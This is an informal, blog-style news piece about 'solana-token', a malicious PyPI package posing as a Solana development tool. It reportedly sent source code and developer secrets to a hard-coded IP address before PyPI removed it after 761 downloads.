A Sneaky PyPI Package Tried to Steal Solana Devs’ Secrets 😈

Picture this: you’re a blockchain developer, sipping coffee ☕, ready to build the next big thing on Solana. You head to the Python Package Index (PyPI) to grab a shiny new tool called solana-token. It looks legit, promising to streamline your blockchain project. But plot twist — this package is a wolf in sheep’s clothing! 🐺 In just 761 downloads, it managed to sneakily steal source code and developer secrets. Let’s dive into this cyber-heist and uncover what went down. 🔍

The Setup: A Fake Solana Tool 🎭

Back in early April 2024, a malicious package named solana-token popped up on PyPI, masquerading as a utility for the Solana blockchain. Solana, for the uninitiated, is a high-speed blockchain platform that’s a darling of DeFi and NFT devs. Naturally, a tool claiming to simplify Solana development would catch some eyes. But here’s the kicker: this package wasn’t about helping devs — it was about helping itself to their sensitive data. 😱

According to ReversingLabs researcher Karlo Zanki, the package was designed to exfiltrate source code and developer secrets to a hard-coded IP address. It was downloaded 761 times before PyPI yanked it from their repository. That’s 761 developers who might’ve had their projects compromised. Ouch! 😣